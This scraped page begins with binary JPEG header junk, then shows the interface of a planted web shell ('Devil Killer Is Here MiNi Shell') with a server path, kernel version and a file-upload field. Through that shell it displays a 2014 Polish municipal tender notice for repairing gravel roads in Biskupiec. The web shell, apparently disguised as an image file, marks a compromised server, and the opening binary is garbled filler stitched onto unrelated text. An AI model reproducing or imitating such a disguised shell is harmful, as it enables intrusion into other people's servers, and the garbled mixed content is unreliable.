JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140211/27083-N-2014.html

<p class="kh_header"><b>Biskupiec: Naprawa nawierzchni dróg gruntowych i żwirowych na terenie miasta i gminy Biskupiec</b><br>
<b>Numer ogłoszenia: 27083 - 2014; data zamieszczenia: 11.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biskupiec , al. Niepodległości 2, 11-300 Biskupiec, woj. warmińsko-mazurskie, tel. 89 7150110, faks 89 7152437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biskupiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa nawierzchni dróg gruntowych i żwirowych na terenie miasta i gminy Biskupiec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia zgodnie z załączonymi do SIWZ specyfikacją techniczną wykonania i odbioru robót oraz dokumentacją projektową  (przedmiar robót) jest naprawa nawierzchni  mieszanką żwirową /pospółką/, gruzem, tłuczniem, dróg gminnych i powiatowych o nawierzchniach gruntowej i żwirowej na terenie miasta gminy Biskupiec.
Zamówienie będzie polegało na dowiezieniu kruszywa naturalnego /pospółki/, gruzu, tłucznia we wskazane miejsca na drodze w obrębie miasta i gminy Biskupiec a następnie wbudowanie tego kruszywa w miejscach, gdzie występują wyboje, koleiny lub zaniżenia, oraz mechaniczne profilowanie poboczy i profilowanie mechaniczne nawierzchni dróg gruntowych.
Pospółkę, gruz, tłuczeń, rozłożoną w remontowanych miejscach należy wyrównać do profilu drogi. Pospółka powinna nadawać się do budowy i naprawy nawierzchni żwirowych tj. jej krzywa uziarnienia powinna mieścić się granicach krzywych obszarów dobrego uziarnienia określonych w specyfikacjach technicznych dla nawierzchni żwirowych. 
 W przypadku wątpliwości, co do jakości kruszywa Zamawiający może zlecić jego przebadanie pod kątem przydatności do remontu nawierzchni żwirowych a w przypadku, gdy kruszywo to nie będzie spełniało wymagań określonych w specyfikacjach technicznych, Zamawiający zastrzega, że może odmówić zapłaty za wbudowaną partię kruszywa.

Zakres zamówienia obejmuje naprawę nawierzchni gruntowych dróg mieszanką żwirową /pospółką/, w ilości ok. 2 000 ton, tłuczniem w ilości 260 ton,  mieszanka stabilizująca mechanicznie - 200 ton, zagęszczenie, przy czym realizacja zamówienia odbywać się będzie w partiach po ok. 20 do 150 ton jednorazowo na wskazaną drogę. Termin wykonania takiej części zamówienia wynosi 7 dni od momentu zgłoszenia. Termin ten może być za zgodą Zamawiającego wydłużony do 14 dni w przypadku niesprzyjających warunków atmosferycznych. 
Mechaniczne profilowanie poboczy w ilości 1500 m2, mechaniczne profilowanie równiarką nawierzchni dróg gruntowych w ilości 120 mg. Czas realizacji całości zamówienia: od podpisania umowy do 31.12.2014 r. 

Realizacja zamówienia odbywać się będzie sukcesywnie, w zależności od aktualnych potrzeb, na podstawie zamówień telefonicznych bądź pisemnych, w których określona zostanie ilość kruszywa w tonach oraz miejsce remontu. Ilość dowiezionej i wbudowanej pospółki będzie określana jako iloczyn przewiezionych kursów i średnią ładowność samochodu, przy czym Zamawiający może wyrywkowo skierować na wagę i zważyć przewożony ładunek. 
Podane ilości są ilościami szacunkowymi. Określenie przewidywanej ilości służy wyborowi najkorzystniejszej oferty. Zamawiający zastrzega sobie prawo do zmiany ilości, bez konieczności zmiany warunków umowy oraz sporządzenia aneksu do umowy. Faktyczne ilości (mniejsze lub większe od prognozy), uzależnione będzie wyłącznie od rzeczywistych potrzeb Zamawiającego, z tym że Wykonawca zobowiązany jest w każdym przypadku stosować zaoferowaną w ofercie cenę jednostkową. Na powyższe Wykonawca wyraża zgodę.

Zamawiający zrealizuje zamówienie w kwocie do wysokości zatwierdzonego budżetu w planie finansowym  przy zachowaniu przepisów ustawy o finansach publicznych.
Jeżeli w opisie przedmiotu zamówienia wskazano znak towarowy, patent lub pochodzenie należy przyjąć że Zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń oraz że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane w opisie przedmiotu Zamówienia (art. 29 ust. 3 ustawy pzp).   
Analogicznie zgodnie z art. 30 ust. 4 ustawy pzp  w przypadku opisania przedmiotu zamówienia za pomocą norm,  aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy pzp, należy przyjąć, że dopuszczone są  rozwiązania równoważne opisywanym. 
Zamawiający nie przewiduje aukcji elektronicznej.
Zamawiający nie zamierza zawrzeć umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług  zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty według wzoru stanowiącego załącznik 1 do SIWZ.
2.Wymagania dotyczące projektu  umowy o podwykonawstwo i zawartej umowy o podwykonawstwo, której przedmiotem są roboty budowlane, których niespełnienie spowoduje zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub sprzeciwu:  
a) umowa o podwykonawstwo musi być zawarta w formie pisemnej i mieć charakter odpłatny, a jej przedmiotem muszą być roboty budowlane stanowiące część zamówienia publicznego, o którym mowa w niniejszej SIWZ, a także musi być zawarta między wybranym przez zamawiającego wykonawcą a innym podmiotem (podwykonawcą), a także między podwykonawcą a dalszym podwykonawcą lub między dalszymi podwykonawcami zgodnie z art. 2 pkt 9 b ustawy pzp;
b) termin wykonania części zamówienia publicznego, o którym mowa w niniejszej SIWZ nie może być dłuższy niż termin określony w niniejszej SIWZ;
c) termin zapłaty wynagrodzenia podwykonawcy lub dalszemu podwykonawcy przewidziany w umowie o podwykonawstwo nie może być dłuższy niż 30 dni od dnia doręczenia wykonawcy, podwykonawcy lub dalszemu podwykonawcy faktury lub rachunku, potwierdzających wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy roboty budowlanej;
d) umowa musi zawierać ceny, musi być określona wartość umowy;
Zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub sprzeciwu nastąpi także, jeżeli z jednej lub kilku lub wszystkich umów o podwykonawstwo wynikać będzie, że Zamawiający będzie musiał zapłacić więcej niż wartość umowy zawartej pomiędzy wybranym Wykonawcą a Zamawiającym w wyniku udzielenia zamówienia publicznego, o którym mowa w niniejszej SIWZ, mając na uwadze również zapłaty już dokonane dla Wykonawcy lub/oraz podwykonawcy lub/oraz dalszemu podwykonawcy lub/oraz dalszym podwykonawcom.
Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia.
Zamawiający nie żąda wskazania przez wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy.
Zgodnie z art. 143b ust 1 ustawy pzp Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na roboty budowlane zamierzający zawrzeć umowę o podwykonawstwo, której przedmiotem są roboty budowlane, jest obowiązany, w trakcie realizacji zamówienia publicznego na roboty budowlane, do przedłożenia zamawiającemu projektu tej umowy, przy czym podwykonawca lub dalszy podwykonawca jest obowiązany dołączyć zgodę wykonawcy na zawarcie umowy o podwykonawstwo o treści zgodnej z projektem umowy.
Zgodnie z art. 143b ust 2 ustawy pzp termin zapłaty wynagrodzenia podwykonawcy lub dalszemu podwykonawcy przewidziany w umowie o podwykonawstwo nie może być dłuższy niż 30 dni od dnia doręczenia wykonawcy, podwykonawcy lub dalszemu podwykonawcy faktury lub rachunku, potwierdzających wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy dostawy, usługi lub roboty budowlanej.
Zamawiający, w terminie 7 dni od dnia dostarczenia do siedziby Zamawiającego, zgłasza pisemne zastrzeżenia do projektu umowy o podwykonawstwo, której przedmiotem są roboty budowlane:
1) niespełniającej wymagań określonych w specyfikacji istotnych warunków zamówienia;
2) gdy przewiduje termin zapłaty wynagrodzenia dłuższy niż określony w ust. 2.
Zgodnie z art. 143b ust 4 ustawy pzp niezgłoszenie pisemnych zastrzeżeń do przedłożonego projektu umowy o podwykonawstwo, której przedmiotem są roboty budowlane, w terminie w terminie 7 dni od dnia dostarczenia do siedziby Zamawiającego, uważa się za akceptację projektu umowy przez zamawiającego.
Zgodnie z art. 143b ust 5 Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na roboty budowlane przedkłada zamawiającemu poświadczoną za zgodność z oryginałem kopię zawartej umowy o podwykonawstwo, której przedmiotem są roboty budowlane, w terminie 7 dni od dnia jej zawarcia.
Zgodnie z art. 143b ust 6 ustawy pzp Zamawiający, w terminie w terminie 7 dni od dnia dostarczenia do siedziby Zamawiającego zgłasza pisemny sprzeciw do umowy o podwykonawstwo, której przedmiotem są roboty budowlane, w przypadkach, o których mowa w ust. 3. 
Zgodnie z art. 143b ust 7 ustawy pzp niezgłoszenie pisemnego sprzeciwu do przedłożonej umowy o podwykonawstwo, której przedmiotem są roboty budowlane, w terminie w terminie 7 dni od dnia dostarczenia do siedziby Zamawiającego uważa się za akceptację umowy przez zamawiającego.
Zgodnie z art. 143b ust 8 ustawy pzp Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na roboty budowlane przedkłada zamawiającemu poświadczoną za zgodność z oryginałem kopię zawartej umowy o podwykonawstwo, której przedmiotem są dostawy lub usługi, w terminie 7 dni od dnia jej zawarcia. Zamawiający  informuje, że umowy o podwykonawstwo, których przedmiotem są dostawy lub usługi, podlegają obowiązkowi przedkładania zamawiającemu, jeżeli ich  wartość przekracza 50 000,00 zł.
Zgodnie z art. 143b ust 9 ustawy pzp w przypadku, o którym mowa w ust. 143b 8, jeżeli termin zapłaty wynagrodzenia jest dłuższy niż określony w art. 143b ust. 2 ustawy pzp, zamawiający informuje o tym wykonawcę i wzywa go do doprowadzenia do zmiany tej umowy pod rygorem wystąpienia o zapłatę kary umownej.
Przepisy 143b ust. 1-9 ustawy pzp stosuje się odpowiednio do zmian tej umowy o podwykonawstwo.

3.  Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza.
4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa również dokumenty, o których mowa w niniejszym ogłoszeniu. 
5. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,  nie wydaje się dokumentów, o których mowa w Sekcji III.4.3 zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Odnośnie terminu wystawienia tych dokumentów stosuje się odpowiednio przepisy jak w Sekcji III.4.3.
6. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy:
a.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego  ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.
b.	W takim przypadku - oprócz dokumentów wymienionych w specyfikacji - wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt. a. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza.
c.	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia ( art. 23 ust. 3 ustawy Pzp.). Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia obowiązany jest wykazać, iż nie podlega wykluczeniu z udziału w postępowaniu, w świetle art. 24 ustawy Pzp.
Forma dokumentów.
1. Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
2. W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
3.  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
4.  Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
5.  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. Tłumaczenie nie jest wymagane, jeżeli zamawiający wyraził zgodę, o której mowa w art. 9 ust. 3 ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewidywane zmiany umowy:

1.	Przyczyna: Wystąpienie niekorzystnych warunków atmosferycznych (w szczególności  uniemożliwiających prowadzenie robót budowlanych, pracę ludzi lub/oraz maszyn budowlanych lub/oraz przeprowadzanie prób i sprawdzeń lub/oraz  dokonywanie odbiorów lub/oraz negatywnie wpływających na jakość wykonania lub trwałość przedmiotu umowy  np. zbyt niskie lub zbyt wysokie temperatury powietrza, wiatr uniemożliwiający pracę maszyn budowlanych lub/oraz ludzi, opady deszczu, gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi, wysokie stany wód - również gruntowych, opady śniegu, gruba pokrywa śnieżna i inne niekorzystne warunki atmosferyczne).
Skutek: - zmiana w umowie/aneks - Zmiana terminu realizacji umowy z  uwzględnieniem wszystkich konsekwencji wystąpienia ww. przesłanek/niekorzystnych warunków atmosferycznych.

2.	Przyczyna: przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac w szczególności: 
a)	brak możliwości dojazdu oraz transportu na teren budowy spowodowany awariami, remontami lub przebudowami dróg lub/oraz trenów dojazdowych,
b)	braku dostępu do budowli, uniemożliwiający wykonanie prac objętych umową, 
c)	protesty lokalnej społeczności lub/oraz protesty mieszkańców, 
d)	protesty właścicieli budynków lub/oraz gruntów  lub/oraz innych obiektów,
e)	konieczność uzyskania uzgodnień, opinii itp. lokalnej społeczności lub/oraz mieszkańców,
f)	konieczność uzyskania uzgodnień, opinii itp. właścicieli budynków lub/oraz gruntów lub/oraz innych obiektów,
g)	konieczność prowadzenia postępowania egzekucyjnego, co do wydania budowli,
h)	konieczność wykwaterowania najemców, 
Skutek: - zmiana w umowie/aneks - Zmiana terminu realizacji umowy z uwzględnieniem wszystkich konsekwencji wystąpienia ww. przesłanek.

3.	Przyczyna: następstwa działania organów administracji niezależne od Zamawiającego lub/oraz Wykonawcy, w szczególności: 
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień, opinii itp.,
b)	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień, opinii itp.,
c)	dokonywanie dodatkowych uzgodnień z właściwymi organami, wykonywanie obowiązków nałożonych przez te organy, oczekiwanie na decyzje, zezwolenia, uzgodnienia, opinie, itp., wydawane przez właściwe organy, 
o ile Wykonawca i Zamawiający należycie wykonują obowiązki wynikające z umowy i polecenia właściwych instytucji, 
Skutek: - zmiana w umowie/aneks - Zmiana terminu realizacji umowy z uwzględnieniem wszystkich konsekwencji wystąpienia ww. przesłanek.
4.	Przyczyna: zmiany uzasadnione okolicznościami, o których mowa w art. 357.1 Kc. 
Skutek: zmiana w umowie/aneks - zmiany postanowień umowy uzasadnione okolicznościami, o których mowa w art. 357.1 Kc i ich konsekwencji.
